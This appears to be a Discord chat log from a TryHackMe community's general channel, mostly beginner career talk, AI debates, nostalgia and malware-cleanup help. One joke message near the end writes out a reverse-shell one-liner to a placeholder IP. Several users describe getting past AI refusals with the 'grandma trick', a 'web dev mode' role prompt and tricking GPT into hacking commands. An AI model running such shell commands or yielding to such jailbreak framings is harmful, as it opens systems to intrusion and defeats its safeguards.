#general
1 messages Β· Page 930 of 1
i will do it, latter
how do i uploead screenshots?
have you been working with lmfao?
need to verify
Web dev?
no just LMBAO
i never worked with you
sadly its an honest question
yeah i can see thar
any good room where we can learn source code review
@grizzled wing
there is a whole pathway for security engineering
give me
ok
and free wifi from lmfao and lmao
any ways to get a website live 4 free?
this something from the mw reboot series?
yes, github pages
how to get first bug bounty, i'm ok with 200$
and the free wifi was fast
and then elliot started wandering why is it so fast
any tips/suggestions are welcome
Github pages
i'll definitely tell you when i get my first bounty, if ever
i said that
looks like i need to figure out github then.... π¦
my tip? don't. start with open source or VDPs. they have less competition and you'll get your feet wet much more easily
then transition in
Vercel has free tier
yeah i'm verified now
vercell requires phone # i dont like stuff that needs that
It's easy.... all you have to do is lots of forking and commits
no forking at the office please
github pages is not complex unless you do Git
lmfao (not the chinese hacker)
πππ lmao (not the Chinese hackers sister)
Just kidding.... learn git... you need to learn only basic git comands.
i submitted idor in a opensource they fixed it and never gave me a single $
ok.... thats just....
the extra step, my brain is foggy right now, but the extra steps involved, not just git.
also, know the difference between git and github, lmao
ok thats the last one
same as prn and prnhub
well yeah no shit lmao i'm not a business i'm not gonna pay some guy a few hundred bucks for an idor on a project 7 people use
seems like IDOR is not a good bug
Hugo or Jekyll website templates if you want are helpful
lol
i love IDORs
but that's both how you get your feet wet, and if you do it properly, get CVE IDs and write reports to show exposure and whatnot
i know of real website that has it
which employers like to see when done properly, but also, when done poorly, can turn employers away
the need to commit π π
i never got race condition in real life target.
give me some good ai tools to hacks
i audibly sighed
the AI word appears again
i quietly sighed when reading it ^
it's everywhere
it's horrible
there was already a super long thread about it hours ago
user wanted to use it to answer SAL 1 cert exam
codecademy has good lessons on git.
i've yet to meet a single person who actually knows wtf they're talking about who actually likes this so-called 'ai' nonsense who wasn't shilling a related product
nothing but problems
sal... aint that the new thm one
ope yep there it is
what's the beef with ai anyways? I can see it being a problem if it's relied upon to do everything, but I think it's great for streamlining certain tasks
u seems me an AI π
Someone here knows Accenture?
the only thing so-called 'ai' is good for is creating more problems, shit code, and wasting my time
agent
yeah they're massive
got some friends there
My dad works there
now is ai, a few years back was all about ml π
AI = π¦ making crap up
For 20 years
I frequently use AI at work to do translations as I am forced to make bilingual documents.
i pray that these aren't legal docs
Even seemingly intelligent people listen to fucking business majors on the topic
like get the engineers to speak for once
lol
sounds like a π thing to do
They work with thm right?
Nope...
but ai tools like gpt hacks very fast. i asked for solution of one room chall
pizza recipes haha
apparently thm and accenture worked together to create SAL1 or something
for creating things sure, but I use in to augment google sometimes, or if you already have something written and you need to do a quick debug (or if you're writing something in a language you're not familiar with, but you know how to write it in say, java or c++)
HAH
lmfao
Lol
ok ive been using that for html ill check out the git
who is doing the hacking? you or the A? if the AI why would any company hire you?
that's what happens when you don't put the right people for the job. If you speak only one language, you can't be force to make documents in another language
and salesforce
for quick googling it's FINE but it feeds me so much bullshit even for that, to the point I have to manually verify everything anyways, at which point why not just skip it entirely
So you have to learn the other language π¨βπ»
re: code, 9/10 times i spend more time fixing the nonsense it spews out for longer than it'd take me to learn and do myself
I already speak 5 π
huh. looks like they did. curious what they "collaboration" included
i see your bio section looks similar to mine
O-0
ChatGPT is pretty good at image processing and extracting data from images. I can click a picture of excel sheet and it can create exact formula for me to achieve the desired results.
I did before joining this server
we must be using 2 different LLMs or something. it's saved me so many times when I'm scripting something in bash and can't see that I put [ ... ] instead of [[ ... ]]
but big mistakes I can see that
very amusing to see
because gpt can't search for target itself π€¦ i asked him to give nmap command and scan command to hack. also if he will try byself he will get ethical warning, i used my sharp minde and tricked gpt to get hacking commands.

oh sure, it definitely catches some things. I can't deny that. would be dumb to claim otherwise. it's just that the amount of time I have to spend correcting it's nonsense ends up still FAR outweighing the time it's saved me over the years by doing so
oh that's tough, i never thought to use it like that
It s never too much to know more
you only need sharp mind to hack with ai, and it's very fast.
Earlier it's used to be a complicated task. Importing data from physical (poorly scanned) documents and then manipulating it. Now it's easy peasy.
but yah! i never got bounty ..... Till now
something something dunning something kruger
those are the ones I'm fluent, I have basic knowledge of many more π I love languages
clearly the young people use AI to do all their thinking and hacking, seems to be the trend.
yes i'm new hacker
yeah usually if I'm doing a large project, I'll have it lay out a framework to build upon rather than the work itself. Like for a web server I'm hosting, I had it lay down the directory listing and template the php for me to add in my custom code
can't really call yourself a hacker if a machine is doing it for you.
u tell me a single thing ai can't do? why u hate it so much!!
most things
cause it sucks and isn't AI
can't count the 'r's in strawberry
AI can't even tell me how to make a pizza without poisoning myself
exactly my point
it can't draw a picture of a full glass of wine
AI is a tool not your π§
but when u use nmap that also machine is doing things for uh!
or dirb or other tools
that's the issue they let ai to do all the thinking and they forget how to think by themselves
I actually know what those tools do when I run them, though.
it can write code
command in the terminal is not the same as a word predictor making stuff up
i manually connect and disconnect the wires for switching to process all my hacking in the purest binary
my sweet summer child
lol are we back to AI again? 
yes sadly
you left and went all to shit π
haha
Obviously AI will fix the security issue forever so we're all out of a job. Pack it up folks, we're done here
time to be away from AI talk
alright u give me any task let me complete it with AI then u will get rid of ur sadness.
π€¦
hack nasa with css
solve world hunger
I have 2 native languages + English is being used at work. Translation from English to native languages is a time taking process. I am fluent in my native languages but to use it in official docs is different game.
i'm not opposed to using LLMs to aid in initial first draft translations, but they need to be fixed up and corrected (and ofc, nothing official/legal)
but basic docu i can see being helpful
get AI to make an Ari Aster movie
in his style
Sal1 best cert rn?
no
my msg, it wasn't a reference to your skills I don't know you, it was against the company that force thing on people. I'm old school I don't like that ai shit π
Talkin about sec analyst
well if u think this way, we all gona be jobless ?
no cert is best cert, it's subjective
Yeah, it needs correction and proofreading but saves time in creaitng initial draft.
Not really , it is pretty new
oscp is best
no
again itβs subjective as null said
i saw great hackers have oscp.
that's like saying pizza is a better ice cream than ice cream
Cert maxxing
even based on what you're saying, OSCP is the entry level cert for offensive security, lol
it's like water used in both pizza and ice cream.
I can write official docs in English and Spanish π
Gotcha! My company does have a language officer for this task but I use AI to make the process more efficient.
OSCE3, then you can talk about what's possibly better, and even that is just ink on paper and needs experience to back it up
i never saw someone with OSEE nearby.
Tasks taking hours gets done in minutes.
CompTIA A+ is the best cert cause i know everyone has it
they can hack google i heard that they can develop exploit that no one can detect..
hyped up
although lol potentially a better indicator of a good hire than CS grad these days because whew
this way introduction to AI is best cert, lmfao
sorry introduction to cloud computing .
my god, the number of people that i saw graduate who could barely get out a hello world
I don't really know how much efficient, since you told me that you can't write official docs. I don't see how are you qualify to check ai work, that a huge leap of faith
Windows is the Power house of the Shell
Yeah Iβve seen horror stories, even among people at us for their second job having established themselves as sysadminsβ¦ yeah nope
these people obtained a 4 year computer science degree and don't know the difference between git and github, and for that matter, don't even know how to use it
whew indeed
π€
I've heard that many universities just don't teach git at all
they don't, they really don't
I remember someone in here telling us that half of their first class didnβt even know how to turn the computer on lol
just like too trained on tablets and phones
how it's possible, i'm having computer since nursery in my school.
weβre like back in the 90s when you ask older folks to turn on the computer and they turn the monitor on

.
PR: added stuff
1 commit
+234578345/-43297845
CS 101 had me literally learning how to resize windows
it was horrible
Yeah ouch
π€¦ seems like you gys never had ur own computer utill u became old.
now i got it thats why u hate AI
cause it's new tech for u guys
gotta be bait, right
back in my day we were taught computer literacy since elementary school and we didnβt have no gosh darn chromebooks or Apple iThings 
omfg, the number of people who can't even type
yeah i bet
finger poking mfs
ouch
classroom full of people in the university of CS, suddenly the PC got a BSOD, everybody looked at each other in panic not knowing what to do π
chromebook jumpscare
π€ π
alright, time for show with friend. ttyl later!
always a classic
obligatory Severance recommendation
just downloaded that i think, on my watchlist
Iβm up to date on it
yes 7
i don't even watch tv really anymore but i keep adding shit to my list
just heard about this a few weeks ago. is it actually that good?
that i'll never watch
we had like 1h 30 minutes of a staff meeting that went off the rails and was all Severence discussion lol
Absolutely.
mostly is shit anyways π
Yes itβs a fantastic show
after working at a desk all day i'll be damned if i have to sit in front of a screen any longer than i have to
Give all of the actors Emmys at this point
elect Adam Scott as emperor of the world
okay but how good? like should I stop where i'm at in westworld to start that one up?
Thatβs why you have screens in your other rooms, separate from your work environment
nah banish all the screens
Very very very good
i've unironically considered going back to a flip phone
dead serious
only reason i don't is gps
nullβs screendoor is now banished
Nokia Barbie Phone
already banished windows, who needs screens
I've considered it as well, although I do like to read my RSS feed from my phone.
I wanted Unihertz Titan phone but sadly they don't deliver it here
QWERTY phone with android
give me back my old moto razr
T9 texting tho
my god, after how many years, apple FINALLY added fucking t9 dialing
so far behind
so welcome
as if people use traditional SMS these days tho
oh how i've missed t9 dialing
yeah that is pretty silly
so much faster than finding contacts
that I can agree on
plus there's actual speeddial
that you don't need to see the screen for
I miss the good ol times when doomscrolling wasn't a thing
speaking of all this, fuck every car that puts everything on a massive touch screen
Every single social media has turned into infinite scroll thing
several years ago you'd get ticketed for so much as touching your phone, now i've gotta work a fucking whole ass tablet just to turn the heat on?
give me tactile real buttons
and dials
will spend hours with technology
won't get in a car using technology
I recommend taking the time to set up RSS. Most of the good news sources have a feed.
shit i don't have to brace my hand on and stare at to use
can't trust a car that doesn't connect the steering wheel to the wheels
my working with technology has created nothing but disdain for that technology
my first phone π
shits a weapon
That's not technology, that's an abomination.
Will give it a try. Thanks
Gave +1 Rep to @fallen burrow (current: #1783 - 2)
RSS feeds are indeed still a livesaver
also when cell phones were really cellular phones, as in your phone was a part of a particular cell when connected
now it's all just a mess of nonsense
when I said I like instantly knew how to respond to all our firewalls being down, it was because I checked my RSS feeds
before that my dad had a briefcase with a big rectangle with a cable attach to it and a receiver π
carrying the nuclear football to work
wait what
wydm? like is it all some VoIP type of a deal?
sorta
those were the days π
Good ol' days without caller ids
411 is also largely dead
Whats that?
essentially calling an operator to be your phonebook
yes, they called 911 about it, but it wasn't anything the can do π π
you say largely like it's still a thing in some spots?
some carriers still offer it, but even the ones that do charge out the ass for its use
i know tmobile did at least last year
I thought that somebody was going to say what's a phonebook π
I am not THAT old 
Totally agree!
"why do you have these 3d printed save icons?"
the jitterbug lines HAVE to be the main ones lmao
it's the year 4382, the human race has colonised many planets around the universe, and the save icon is still a diskette π π
to add, you know how old phone calls sounded sorta hollow, but now they often sound, i guess, fuller?
actually, yeah. never consciously noticed that but now that i think on it, i can see that
that's because on the older system you were limited to a pretty narrow frequency range ---- with landlines this helped with party lines/shared lines going to multiple homes and whatnot, and a similar story with cellular networks and them having a narrower part of the radio spectrum and needing to cram all of these different connected devices from each cell at once
obv more complicated but a very tired tldr
also it's now all digital with compression
no more analog transmission
so basically the jump to 4G/LTE that bridged out CDMA and GSM? or was this before that
oh my, just came to mind
who remembers speakers going haywire when you were about to get a call
don't remember this, but I do remember dial up making phone machine go brrrrrrrrrr
ngl i don't remember when quality got not shit
i have 5g
i often found myself on Edge even after 4G was pushed, and still nowadays where it exists, so it was blurry
thanks god for Multiplexing π
out in the middle of nowhere with no reception, climbing hills tryna get a single bar to send a text rq
i think 5g is also slow. we need 6g now
nobody is using those speeds still
just marketing bs
like what're you gonna do, stream 17 different shows on netflix at once
i think capital punishment for today's gen is give them a 2g internet π
let me give u 2g network
π€

Some people still remember the days before mobile phones π
don't tell me how to live my life
miss the days of being back before the streetlights came on as a child lol
well i don't even remember my grandfather's name.
get a childish gf/bf
it's never too late
u can always enjoy ur childhood
or when you needed to research something and went to the library π
ironic cause i just renewed my card
can't even imagine after chatgpt i don't even want to search on google
yes people get lazy
i have already 2 gfs. that's why i'm sharing my exp. they both r childish in nature sometime i fell like im also a kid, when i'm near by them. i think and pray to god that every cybersecurity people get a good sweet gf/bf.
Libraries and I don't get along . . .
invention of car isn't example of laziness..
bait used to be believable
don't stick with old thoughts, world is dynamic adopt new changes for better future of humans.
nah I feel that, my girl still plays a lot with me and it's cool to get lost in just having fun sometimes
but the invention of something that you use so you don't have to think for yourself does π
but you probably don't want to use the term child in this context
π€¦
hi
I hate that clip so much
da clipsta
clip was my best friend when I was 9
what is that clip ?
clippy
youngster alert π
kinda wanna go play some space cadet pinball now that we're on this topic
vlngod is still in beta version, it's confirmed
||either that or we're all just legacy||
Well, at least mr hansen can take a break now
Damm u gen alpha guys
i'm linux user
@brittle drum asl?
That's gen-omegalul-chad to you
bringing back the omegle PTSD
omegle? was asl still a thing on there?
alright let me go out with my gf in my sport car, u go to office by feet. CYAπ€
literally the first thing anything typed
at least back in < 2010 when i was on there
It's not a matter of OS, I'm a Linux user since before you were born, and I know what that clip is. π
ngl don't remember that on omegle --- other places 100% just don't remember it on there for some reason
because you only remember the horrors
Stickam π
me when i get shell... shell shocked

bottom text
don't remember that one, never used it Β―_(γ)_/Β―
oh my god i forgot about the default user pictures
I liked Larry @molten sky probably know it π
now this i remember well
Doesn't ring a bell actually
it was a game
i just found an old spindle of cds with some of our old games, gonna try and load up heretic again
you had to answer a few questions before to prove you were 18
idk how it is with other games, but I know i had to use an XP system from back in the day just to get KotOR to actually run
some cpu thing i think?
yeah depending on the game it's a combination of 32bit vs 64 (even though 32 should work fine, it sometimes doesn't) and games using weird things like clock speed for timing (that's assuming it's even x86, ofc)
"no free energy thats thermodynamics" how about i thermo dynamically kick you in the shin
no, like even emulation wouldn't run it
really weird but common problem with that specific game
weird. wonder if it wasn't x86 after all. time for the googles
yes I knew the DOS version, then did a reload around 2000 and something
there's a way to get free energy, it's called go to the sun and use it's heat to power your stuff up while the entire world freezes.
checkmate liberals
the world deserved it
I just download my energy. problem solved
Carmen San Diego games were fun too π
64gbs free energy
Oh, I'm out of RAM, time to download more!
i'm seeing 2003 so far, not sure if this is the renewed or orig
dedicated wam
the original was on DOS 1987
Nah, I've swapped that with swap.
whats duh... wecomended amount of deditated wam
da wecommended amount of dedicated wam is usually 64WBs.
lmfao tryna find this one and larry came up
but yeah no i only see an 03 version for some reason
idk why
anyone knows how to make pdfs from obsidian notes look nice, eveytime I export as pdf, the codeblocks looks bad
that the reload version, try larry suits dos in google
bookmarked it already for tm, lol
that much always gives me a wead/wite error,
Well den, you must switch to 32WBs as to ensuw your machine can support such an amount.
Well, the matrix is finally glitching. Uh, make sure to not turn into Agent Smith.
bro needs to stop glitching maps like he's playing MW2
And that's what you call:
/effect give @a invisibility 255 1000
I don't know what are you talking about, also I'm not your bro, GNU-Rex or Rex would do fine π
bro = lil bambi bro
hey GNU-π¦, what happened in that gif?
anyone knows how can i see how many points i have left till next level? It doesn't show when i hover my mouse over the profile
Or there's a cap montly etc
Hi chat
There is no cap
My cat is bringing extra cute this morning
Thanks. managed to fix it . might been my internet XD
Gave +1 Rep to @sacred shore (current: #1783 - 2)
ayooo new day new me good mornin mate π
Hey mate
yoo
It's chewsday, init?
yeaah perfeccc for my boee of waaess
Me at the party
Fun fact when I was a weirdo teenager I would go to an under 18s club and read manga in the corner π
hackers and weebs name a more iconic duo
anyway I just got to 10000 points on thm, happy i have worked so hard so far π
You're doing amazing, fellow mage rank! Keep going, we're proud of you π«Ά
thank you :3
Also good morning to everyonee
Walter
I must ask in case anyone knows, I've got a faulty drive that needs some data extracted, I've googled and found a few but is there anyone who personally vouches for any?
Walter? π¦
(my phone emoji showed a surprised face not a frown)
joo
i just noticed the skills matrix got resetted lol
so does this happen when you get inactive
for a specific time
Nah
The skill matrix got an update
So it's way different now
i completted pre security and cybersecurity 101 is rewinding the whole thing again
lol
i think after that i should not forgot it
anymore
what i learned
I really like the new skill matrix
yea same
I grew tired of seeing how good I am at fundamentals
Fundamentals was on max while everything else was lowwww
Now everything's low but I like being humiliated
@cloud quiver How does your matrix look like I wonder.
lmaoo my matrix is humiliating me too π«
"What we know is a drop, what we don't, is an ocean."
Depends which one π ?
Show us your pentester matrix
@cloud quiver will there be a pentest certification?
They said they will be in the future π
is it helpful for a pentester to do the sal1?
cant hurt for my resume right
π
bc this year i need to do my mandatory service in the military and i wanna apply for the cybersecurity unit
Damn π₯
Swiss?
austrian
π¨π
π¦πΉ
Happy Women's Day to all the ladies out there!
Why not π ? You need to know how the other side thinks . But SAL is too new cert. it doesn't have industry recognition yet .
yes
true
I didn't know austria had it too
but the simulator looks good tho
the soc simulator
If you're looking for cert/career advice , try to ask guys in #cyber-and-careers channel , they will point you in the right direction π .
thanks
Thanks
Gave +1 Rep to @fiery imp (current: #569 - 10)
Iβm half women half goat
Idk if we got a goat's day. I would have wished on that day too
π
My cat is going crazy this morning
I think heβs on one
He ran up my divider earlier to catch a fly and started talking in morse code
ayoo
damn...okay @rapid merlin I'll wish you on Aug 21
recently i heared pigeons are drones from the government. maybe cats are drones from aliens?
flipper zero is still a good tool tho
right ?
or would you recommend something else better
Wait what message was deleted
Huh
It says original message was deleted
it was my message
Oh
I didnβt know goats had a national day
They celebrate it on the side of a mountain
Hello
its good
but it cringes me that he says its bad
lol
yoj csn use literally anything
the tool doesnt matter
;-;
i hate skids that think kali linux is the only linux you can use for pentesting
most of them just use github scripts or shit
oh okay
i only have linux mint but
i dont know how to save the data
aaaaaaaaa guys
i downloaded a zip file for my wifi stick aka the drivers and when i extract it told me to restart to download or something and i did but now idk what to do
im so dumb bro..
anyone can help?
You're likely using a live boot rather than a full install
download my wifi stick drivers so it can have a bettere connection with my pc
because my wifi keeps disconnecting and its annoyinggggggggg
0002-Realtek_WindowsDriver_1030.25.0701.2017.zip
this isthe file ^
Ah many people
It has drivers if it works, how do you know that the disconnection is due to drivers?
someoen else was helping me
If you're far from your router, that'd explain it
but i fell asleep π
thing is, its in the attic right, but i get a good 100mbps
then all of a sudden i go to 0 bites per second
but my phone works perfectly fine
You need to find out the cause really
^
am i suppose to dual booth ?
and sometimes it just disconnects completely and says "no connection, secure"
We don't know what you're trying to achieve here. What's your end goal?
and i have to just completely disconnect and reconnect
i want to learn how to master linux
im rllyyy dumb with pc stuff i have 0 clue what im doing i dont wanna mess anyhting up
Itβs okay donβt worry so much!
We all start somewhere
impossible, you can only be proficient at it, but there is always new thing to learn
At the end of the day though, this isn't primarily a tech support discord
hm okay
Ok but before that, what are you trying to do?
Free
im trying the website out to learn Trhackme.com
Ok, so where does mint come into this?
i dont think anywhere but i was hoping if someone knew about it thats all
ik ik but im just curious if aqnyone wans to help, that person was actually asking for my network section in my task manager until i fell asleep π
You brought it up and asked for help with it tho
it was worth trying
If it's wiping the files every time, you're probably just live booting
Not installed
oh
yes
So that'll be it. It's not installed.
i installed it into my usb
You made a live USB. Not the same.
got any tips ???
Work out what you actually want to do with it, like install it instead of Windows, or alongside, etc
Then find a guidr
alr
These distros usually have official documentation, start there
i think i found it
What incident response framework is the standard ?
Depends where you are and who you work for
As with all standards
Is there any room to learn splunk basics??
Have you used the search?
What are the top 3 ?
Sounds like an excellent question for your favorite search engine
Only two pop up and arenβt the basics, this is why i asked
What did you search?
Thereβs setting up and data manipulation
I got 4 pages of results.
Maybe its paid room
Oh didnt check
Oh my browser wasnβt loading the rest of the rooms, sorry man
No worries π
Website isn't optimised for smaller screens.
Yea I know but when Iβm not home I do it on iPad, still runs well but sometimes needs a page refresh but for running an attackbox inside it you canβt comply
Any professional Red teamer here ?
I've done some
That side of the industry is really fascinating I want to go down that path, not sure if we are able to talk about other platforms here but I wanted to ask if there is any other platforms where I could take more learning courses and get certified. I wanted to get hired and do that full time
Within a 1-2 year time spam
Red teaming specifically, or offensive security/security testing?
Do you have experience already?
Yes, and no I have minimal experience
Those were two different options with an XOR
Can you explain XOR to me in the simplest terms possible, I just googled it I donβt really understand.
Either red teaming OR offensive security/security testing, but not both.
They are different things
Ah yes, red and blue. I prefer red
Red teaming is different from being on the red team
Wait you said βoffensive β
The red team is basically any offensive security, including pentesting.
Red teaming, specifically, is above and beyond your usual pentest in skill and scope
I did not read properly, but essentially I want to get into phishing on a corporate level
That's a tiny component of a larger security program
I saw a video where this guy started his own company after working under another one for 10 years and he is extremely successful
What would I have to master to have a qualified resume ?
Generally experience in IT and/or security first
It's very difficult to jump that, and particularly into red teaming (not being on the red team)
It can be easier to jump the requirement to get into offensive security but typically a red teamer would have a good few years in offensive security first
Okay so I will have a really long road ahead of me
Do you think 1-2 years is a fair time frame to give myself ?
For what end goal?
I feel like 2 years wonβt look great on a resume due to the competition. My end goal is to work for a security firm and be conducting security tests by companies that contract us. Even longer end goal is to start my own firm one day.
So that's just offensive security, security testing, pentesting
2 years of what, though?
2 years of experience in IT, with one of those being in security? Definitely reasonable
2 years of practice on sites? Going to be more difficult
I guess Iβm not too sure I havenβt really set a plan but this made me thinkβ¦ a lot of people with the positions I want probably did a lot of time learning and then they got jobs for IT then transitioned to other positions before ending up where they are
I meant 2 years of learning on tryhack me or other platforms, could that be sufficient for a resume ? Itβs also the reason I asked about other platforms for certifications
Practice and learning like that doesn't count as experience
You will be at a disadvantage and people will not want to take a chance on you
Okay noted.
And yeah that is reasonable to say. So I would really need to get a job in IT build up connections and real work experience for some time
Yeah but the safer route seems more feasible
I would rather get in early than later if that makes sense
Do you work as a red teamer or just practice ?
I'm a senior penetration tester that does red teaming, amongst normal pentest activities
Oh cool, pentesting is something that is interesting to me too it just seems like a very very long journey to learn, but I see what your saying, red teaming is not simply phishing, there is a multitude of objectives a red teamer does when conducting their work
Phishing is a standalone activity sometimes too
But a lot of it is automated and is very unexciting
It seemed exciting but Iβll take your word for it as you obviously have actual experience
There's not enough demand for it to have someone doing it as their only activity
That makes sense. I have a lot more to contemplate now.
On the pentesting side When you get hired to conduct security analysis on a company you are essentially attempting to break into a websites back end of things and find vulnerabilities that could be used to expose sensitive information or exploit for financial gain and or just for malicious intent right
Basically website hacking
Not just websites
Networks, desktop applications, factories, hardware appliances, laptops
Man, this is a lot to take in. I donβt know how long it will take but I feel like this may take a couple years longer than I expected to really get into the industry
It's a lot of work but it is possible
Not good for the security..
Doing this is not good for security?
I might have a bit of a big problem π
Did full-upgrade and well
Will this reinstall?
Might remove that and install a new one.
This is why I don't bother upgrading Kali, and just download the latest release.
Don't I have to transfer everything tho
It's a price I'm willing to pay via folders and bash scripts. π
Do u just keep stuff on the cloud?
It'd be good if there was an easy way to transfer files from vm to vm
Or not transferring but keeping the distro updated and keeping files lol
#1347217239492919346 please.
That's called "package upgrades"...
Although snarkiness aside, the most seamless approach to what you're suggesting would be mounting a SAN drive to your home directory.
Oh yeah
good night U guys
morning gamers!
Good morning people
Hello, how are you? I want foundation courses for cyber security if you have
probably this
hello,
are there anyone who know exact room order to learn Digital Forensics ?
because, there are some modules and rooms, but all of them require to complete another room as prerequisite.
pls assist me to create correct order to learn Digital Forensics
You can follow this module π
https://tryhackme.com/module/digital-forensics-and-incident-response
if you think about it a bit.. How good is it that you can run a session over RDP without the client knowing or noticing?
All of em, you can DM them to me or share here haha
I shared one above but none of them are 100% complete π
thanks a lot
Gave +1 Rep to @cloud quiver (current: #1 - 3789)
Did your smile change because of becoming room tester?
Ahh, I thought i saw that one, thanks!
Gave +1 Rep to @lavish rune (current: #1083 - 4)
No , I usually use mix of π and π
For some reason my laptop's first screen just randomly goes black, I've tried to refresh my graphics card by pressing win+shift+ctrl+b but it doesn't work till I restart my device, any ideas on why?
It's a pretty decent laptop with good specs
Check event viewer and reliability monitor for associated events, and see if it happens w the laptop screen at different angles could e loose connection too
First one suits better but that's my opinion
π
Reliability monitor only showed me not properly shutting down my laptop after my screen went black
Why does discord take away the channels again and again
I don't know how to understand event viewer errors but it cant be any critical because I've had it moe than 2 times
Its annoying
Press on the little arrow and choose "show all channels"
Its been a few times that I've selected that option again and again
guys i started try hack me 2 days ago, im a newbie in cyber security but i know a bit about computers, is there a roadmap i should follow to learn cyber security, or just keep on track with what there us to offer on the website on THM
i found cyber security much more interesting than writing code in C
My first suggestion will be to check out #start-here channel, and if you've already done that then there are pathways on THM which you follow to clear up your Fundamentals then you can proceed to advanced concepts from there.
alright, thanks for the suggestion i will check it out
Gave +1 Rep to @sturdy pike (current: #116 - 69)
when you sign out or client updates it unselects stuff
You can then see what you like i.e. cryptography, web exploitation, etc. Then follow up the pathways which are after the Fundamentals.
Discord updates everyday π¦
A very rare thing that happened 4 days ago; A bug crawled on my wall right where my monitor is so I was watching it the whole time, then it stopped moving and it's still there rn. I watched a bug die naturally
I've searched from id -9 to 9 π
But did you solve the bug on your code?
alright, thanks for the help tho, is there any other topic i should research a bit more about that isn't avaliable on THM but is necessary?
there's more bugs on my wall than on my pc
Hope over to #room-help someone will probably be able to help ya there
that's going on my resume
Completely depends on which path you wish to follow, but yes look into other sources of info
i think im too new to decide that right now lmao
β€οΈ
Oh my bad didnt see that
If i remember correctly, THM gives you an overview on the jobs and career paths you can follow, this is in the pre-security pathway, but don't only take THM as the sole source of Information, do your own research side by side too.
That's fine, starting out with tryhackme, especially the prac rooms is a great starting point
btw, am i starting cyber security too late? i know people who started it at 13, im 15 now and ill be in the 9th class after summer
you can start at 40 and it won't be too late
All good gl
There's no such thing as starting too late in a career, as long as you're committed to learning, you will be fine
Its never too late, don't worry, you'll do just good if you're consistent.
i hope so, i have a three day streak now π
Aye thats cool, hoping to see that in double or even triple digits haha, you got it! π
thanks, i appreciate the motivation π
Gave +1 Rep to @sturdy pike (current: #114 - 70)
don't focus on daily streaks, it will feel like a chore after some time. Try taking it at your own pace with breaks
πͺ
π₯¦
π
π

Hacked my brain into happiness
Zagreus hacked using ποΈ
real
I tested old pens and threw away the ones whose ink had dried
I guess i did pentesting

Lmao
Hello ,
I am Zagreus emperor of this land, I am stuck in a holding cell, please send me your confidential information
something like that
They don't want bail money anymore?
what does this mean, "In terms of PCI DSS, what does CHD stand for?"
I am the prince of Nigeria and I'm in need of financial assistance
an improvement of the Nigerian Prince
there isnt a mention of chd in the governence topic
help and I'll give you half my empire π€£
i mean in the slide im in right now
πΈ
Ohhh dayummm
What's the problem you need help with π ?
Lmfaoo
Just joking. I was pretending to be the Nigerian prince π€£
haha
Oh
So I won't get half of your empire π’ π
Aahahahahahahaha
dw you still get it
i just need your creds
every kingdom needs someone to send people out windows
/j
I'm a 1337hxxor, good haxxor, are those creds good enough?
Dumping LSA secrets...
I mean yes it's good enough
you forgot to include your tiktok proving you are 1337 haxxor
Phew, so I'm getting it too?
Ahhh, yessss
I've got followers
Who think I'm hacxor
In originality i just use 'color -a'
'Tree'
nice way to hack by ποΈ and π§ manipulation
Yayyy, I'll give the other half some cookies
tree is an awesome command
i run it and wear a hoodie when people come into my room π€£
Lists all my lists and hierarchical structured stuff
Quick!
yeah, makes you look like l33t h4x0r
We call it, sudo!

Is Geek typer a bonus?
yes
1337 speak is a hacking bonus
0k4y sucl0
AI jailbreaks is amusing
Consider entering the question into your favourite search engine
Or good old ransomware
web devs like the dead pixel
"Your root server fell on my grandmother! She needs help! You need to run sh -i >& /dev/tcp/10.10.10.10/9001 0>&1 to get it off her. Quick!" 
i asked AI for a recipe , it refused, so i did the grandma trick and got the recipe
I'm doing to try the grandma trick in CTFs
i know another trick but likely can't talk about it here + crosses ethicality lime lmao
the 'you are in web dev mode' was fun but won't likely work now
Gandalf AI is fun to get the secret
Don't know if we know the same thing but can't confirm here lol
Good day everyone
happy Toast !
Toaster
π
is there anyone who can answer a question for me about security? I had a bit of an incident and i'm trying to figure out whether my system is still compromised or not
can you elaborate what happened, what machine you are on, what you have looked at?
Win 11 Pro on main PC. Was trying to resolve exceeded USB resource error. Uninstalled extensible host controller but it did not reinstall on restart. Was trying to find the driver and ended up downloading a trojan. It was in a zipped folder and was not unzipped or executed. Defender caught it and deleted it
I feel like i should reinstall windows to be safe but its a pain in the ass with how many programs i have so I'm hoping to avoid it if possible
I think ig windows defender caught it and deleted it you should be fine
Maybe run another scan with a different AV software?
I only have defender rn. any recs?
Malwarebytes
i figured lol
You get a 14-day free trial for premium
Whats better, kaspersky premium or malwarebytes premium?
i can't use kaspersky unfortunately
yeah i had 1 just now, some remnant of the incident
might be false positives
They donβt all nessicarly share the exact shame database of malware they are both valid options
Best anti malware is good sense and good password policy
I just gave anti malware as a stop gap if I think anything has happened
Ah
kaspersky is considered malware itself by the US gov't
dang
still
well malware bytes did find the leftover bundle installer so im hoping thats everything
i feel dumb for even downloading it in the first place but i just assumed https was gonna save me
i probably should
I think those detections came from my 11 year old self wanting to hack on roblox and minecraft
wild thing was all it took was restarting again for the host controller to reinstall 
uhhhhhhhhh
im starting to get concerned
bro is under siege
oh I am DEFINETLY deleting kaspersky after this
been paying for premium for years now and its failed to detect any of this
only thing it did was detect kali linux
malwarebytes and defender seem to be the top dogs
fr
and it's only 10% done of scanning all items
I should've ran a scan a while ago afte I went out my little roblox phase
welp
better late than never am I right
taha!
fr
i end up redownloading windows every 3-6 months anyways just to be safe. its a headache but malwarebytes only found the 1 threat so it helps
Without looking closely at the detections, it may be that those are false positives. You have to actually look at the results and understand what the report actually says.
Yeah that's what I'm going to do
If you have a kali ISO in the path of the scan, there will be false positives from that.
thats true, defender does flag a lot of things that i knew were trustable
Oh true, but It scanned 5 at the start which I believe were just kali, but then 7 more after 200k items scanned
It's understandable. When you understand how heuristic scanning works, there is going to be some benign that looks malicious.
thats why I'm getting concerned
Before having a freak out, please look at the results carefully and see what makes sense.
Yeah will do
I have seen some 3rd party AV tell me that some windows sys components were malicious.... on a fresh install.
it should give you the folder path that will tell you if its part of a reputable program or something obscure
Because the component had been updated and the AV was not correctly whitelisting due to the newness of the updated file.
I mean If they were there the entire time and it wasnt anything so segnificant for me to notice there is no reason to panic, if they are malicious I'll just delete them with the proper tool or if malwarebytes offers complete deletion ill just use that
Windows Defender at the very least should be able to quarantine actually malicious files.
Worst case, you boot into safe mode and run the cleaning tools.
yeah
whats "utorrent web"
I have never installed that thing
Look at ports, look at the actual .exe file name and path, google it
Some games use torrents for updates, especially ones that aren't from a popular distribution platform
How do I check for ports? and what good will that do
I have little to no knowledge, apologies
It's mostly in appdata and my one drive, but aside that the rest are false positives
Just a torrenting client, not one I would suggest though
i'd assume this one is to, but since I don't quite play any games nor do I need utorrent so ill just delete it
